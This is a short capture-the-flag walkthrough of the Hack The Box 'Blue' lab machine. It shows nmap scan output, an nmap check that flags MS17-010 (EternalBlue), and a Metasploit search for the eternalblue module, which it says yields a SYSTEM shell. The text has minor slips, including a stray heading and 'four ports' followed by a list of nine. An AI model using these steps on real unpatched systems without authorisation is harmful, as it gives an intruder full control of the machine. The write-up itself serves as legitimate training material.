Hack The Box: Beginner Track - Blue


This is the eighth machine of the Hack The Box Beginner Track: “Blue”.


Lame

box arch

We run sudo nmap -sC -sV <IP> on the most common 1000 ports and find four ports open: 135, 139, 445, 49152, 49153, 49154, 49155, 49156, 49157.

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC    
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
                                       
Host script results:
| smb-security-mode:                                                                                                                                           
|   account_used: guest                                                        
|   authentication_level: user
|   challenge_response: supported                                              
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:                                                          
|   2.1:                                                                       
|_    Message signing enabled but not required
| smb2-time:                                                                                                                                                   
|   date: 2022-11-01T14:31:57                                                  
|_  start_date: 2022-11-01T14:27:21                                                                                                                            
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) 
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00 
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-11-01T14:31:53+00:00
|_clock-skew: mean: 2s, deviation: 0s, median: 1s

And because the machine is called “blue”, let’s check explicitly for the eternal blue vulnerability:

$ nmap -p445 --script smb-vuln-ms17-010 10.129.85.175

and the result is: vulnerable.

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

So let’s use metasploit to exploit it:

msf6> search eternalblue
Matching Modules
================

   #  Name                                                  Disclosure Date  Rank     Check  Description
   -  ----                                                  ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue              2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

And after executing it, we get a shell as “nt authority\system”.